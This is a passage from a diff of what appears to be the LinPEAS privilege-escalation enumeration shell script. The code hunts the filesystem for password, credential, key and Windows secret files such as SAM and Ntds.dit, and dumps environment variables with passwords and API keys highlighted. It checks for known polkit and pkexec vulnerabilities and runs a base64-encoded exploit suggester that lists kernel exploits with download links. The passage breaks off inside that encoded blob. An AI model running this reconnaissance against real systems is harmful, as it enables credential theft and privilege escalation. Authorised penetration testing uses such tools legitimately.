"^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + + + ##### POST SERACH VARIABLES ##### + backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" + printf ${YELLOW}"DONE\n"$NC + echo "" +fi + + + + + + + + + + + + + +if echo $CHECKS | grep -q system_information; then +print_title "System Information" +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then + warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#-- SY) CVE-2021-4034 +if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then + echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "" +fi + +#-- SY) CVE-2021-3560 +polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9) +if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(rpm -qa | grep polkit | grep -c '0.117-2\|0.115-6')" -ge 1 ]]; then + echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "" +fi + +#--SY) USBCreator +if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then + print_2title "USBCreator" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" + + pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") + if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + fi + if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," + fi + fi +fi +echo "" + +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" + +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" + +#-- SY) System stats +if [ "$EXTRA_CHECKS" ]; then + print_2title "System stats" + (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" + warn_exec free 2>/dev/null + echo "" +fi + +#-- SY) CPU info +if [ "$EXTRA_CHECKS" ]; then + print_2title "CPU info" + warn_exec lscpu 2>/dev/null + echo "" +fi + +if [ -d "/dev" ] || [ "$DEBUG" ] ; then + print_2title "Any sd*/disk* disk in /dev? (limit 20)" + ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 + echo "" +fi + +if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then + print_2title "Unmounted file-system?" + print_info "Check if you can mount umounted devices" + grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" + echo "" +fi + +if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then + print_2title "Mounted disks information" + warn_exec diskutil list + echo "" +fi + +if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then + print_2title "Mounted SMB Shares" + warn_exec smbutil statshares -a + echo "" +fi + +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBELET" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" + +#-- SY) Dmesg +if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Searching Signature verification failed in dmesg" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" + (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" + echo "" +fi + +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then + print_2title "Kernel Extensions not belonging to apple" + kextstat 2>/dev/null | grep -Ev " com.apple." + + print_2title "Unsigned Kernel Extensions" + macosNotSigned /Library/Extensions + macosNotSigned /System/Library/Extensions +fi + +if [ "$(command -v bash 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester" + print_info "https://github.com/mzet-/linux-exploit-suggester" + les_b64="IyEvYmluL2Jhc2gKCiMKIyBDb3B5cmlnaHQgKGMpIDIwMTYtMjAyMCwgQF9temV0XwojCiMgbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2ggY29tZXMgd2l0aCBBQlNPTFVURUxZIE5PIFdBUlJBTlRZLgojIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSwgYW5kIHlvdSBhcmUgd2VsY29tZSB0byByZWRpc3RyaWJ1dGUgaXQKIyB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlLiBTZWUgTElDRU5TRQojIGZpbGUgZm9yIHVzYWdlIG9mIHRoaXMgc29mdHdhcmUuCiMKClZFUlNJT049djEuMQoKIyBiYXNoIGNvbG9ycwojdHh0cmVkPSJcZVswOzMxbSIKdHh0cmVkPSJcZVs5MTsxbSIKdHh0Z3JuPSJcZVsxOzMybSIKdHh0Z3JheT0iXGVbMDszN20iCnR4dGJsdT0iXGVbMDszNm0iCnR4dHJzdD0iXGVbMG0iCmJsZHdodD0nXGVbMTszN20nCndodD0nXGVbMDszNm0nCmJsZGJsdT0nXGVbMTszNG0nCnllbGxvdz0nXGVbMTs5M20nCmxpZ2h0eWVsbG93PSdcZVswOzkzbScKCiMgaW5wdXQgZGF0YQpVTkFNRV9BPSIiCgojIHBhcnNlZCBkYXRhIGZvciBjdXJyZW50IE9TCktFUk5FTD0iIgpPUz0iIgpESVNUUk89IiIKQVJDSD0iIgpQS0dfTElTVD0iIgoKIyBrZXJuZWwgY29uZmlnCktDT05GSUc9IiIKCkNWRUxJU1RfRklMRT0iIgoKb3B0X2ZldGNoX2JpbnM9ZmFsc2UKb3B0X2ZldGNoX3NyY3M9ZmFsc2UKb3B0X2tlcm5lbF92ZXJzaW9uPWZhbHNlCm9wdF91bmFtZV9zdHJpbmc9ZmFsc2UKb3B0X3BrZ2xpc3RfZmlsZT1mYWxzZQpvcHRfY3ZlbGlzdF9maWxlPWZhbHNlCm9wdF9jaGVja3NlY19tb2RlPWZhbHNlCm9wdF9mdWxsPWZhbHNlCm9wdF9zdW1tYXJ5PWZhbHNlCm9wdF9rZXJuZWxfb25seT1mYWxzZQpvcHRfdXNlcnNwYWNlX29ubHk9ZmFsc2UKb3B0X3Nob3dfZG9zPWZhbHNlCm9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCm9wdF9za2lwX3BrZ192ZXJzaW9ucz1mYWxzZQoKQVJHUz0KU0hPUlRPUFRTPSJoVmZic3U6azpkcDpnIgpMT05HT1BUUz0iaGVscCx2ZXJzaW9uLGZ1bGwsZmV0Y2gtYmluYXJpZXMsZmV0Y2gtc291cmNlcyx1bmFtZTosa2VybmVsOixzaG93LWRvcyxwa2dsaXN0LWZpbGU6LHNob3J0LGtlcm5lbHNwYWNlLW9ubHksdXNlcnNwYWNlLW9ubHksc2tpcC1tb3JlLWNoZWNrcyxza2lwLXBrZy12ZXJzaW9ucyxjdmVsaXN0LWZpbGU6LGNoZWNrc2VjIgoKIyMgZXhwbG9pdHMgZGF0YWJhc2UKZGVjbGFyZSAtYSBFWFBMT0lUUwpkZWNsYXJlIC1hIEVYUExPSVRTX1VTRVJTUEFDRQoKIyMgdGVtcG9yYXJ5IGFycmF5IGZvciBwdXJwb3NlIG9mIHNvcnRpbmcgZXhwbG9pdHMgKGJhc2VkIG9uIGV4cGxvaXRzJyByYW5rKQpkZWNsYXJlIC1hIGV4cGxvaXRzX3RvX3NvcnQKZGVjbGFyZSAtYSBTT1JURURfRVhQTE9JVFMKCiMjIyMjIyMjIyMjIyBMSU5VWCBLRVJORUxTUEFDRSBFWFBMT0lUUyAjIyMjIyMjIyMjIyMjIyMjIyMjIwpuPTAKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBlbGZsYmwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI9Mi40LjI5ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vaXNlYy5wbC92dWxuZXJhYmlsaXRpZXMvaXNlYy0wMDIxLXVzZWxpYi50eHQKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L2VsZmxibApleHBsb2l0LWRiOiA3NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSB1c2VsaWIoKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj0yLjQuMjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9pc2VjLnBsL3Z1bG5lcmFiaWxpdGllcy9pc2VjLTAwMjEtdXNlbGliLnR4dApleHBsb2l0LWRiOiA3NzgKQ29tbWVudHM6IEtub3duIHRvIHdvcmsgb25seSBmb3IgMi40IHNlcmllcyAoZXZlbiB0aG91Z2ggMi42IGlzIGFsc28gdnVsbmVyYWJsZSkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBrcmFkMwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjUsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAxMzk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDQtMDA3N10ke3R4dHJzdH0gbXJlbWFwX3B0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE2MApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHJhcHRvcl9wcmN0bApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEzLHZlcjw9Mi42LjE3ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMjAzMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHByY3RsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA1CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGw0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDExCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMzYyNl0ke3R4dHJzdH0gaDAwbHlzaGl0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuOCx2ZXI8PTIuNi4xNgpUYWdzOgpSYW5rOiAxCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDExMTEwMzA0MjkwNC9odHRwOi8vdGFyYW50dWxhLmJ5LnJ1L2xvY2Fscm9vdC8yLjYueC9oMDBseXNoaXQKZXhwbG9pdC1kYjogMjAxMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE3LHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9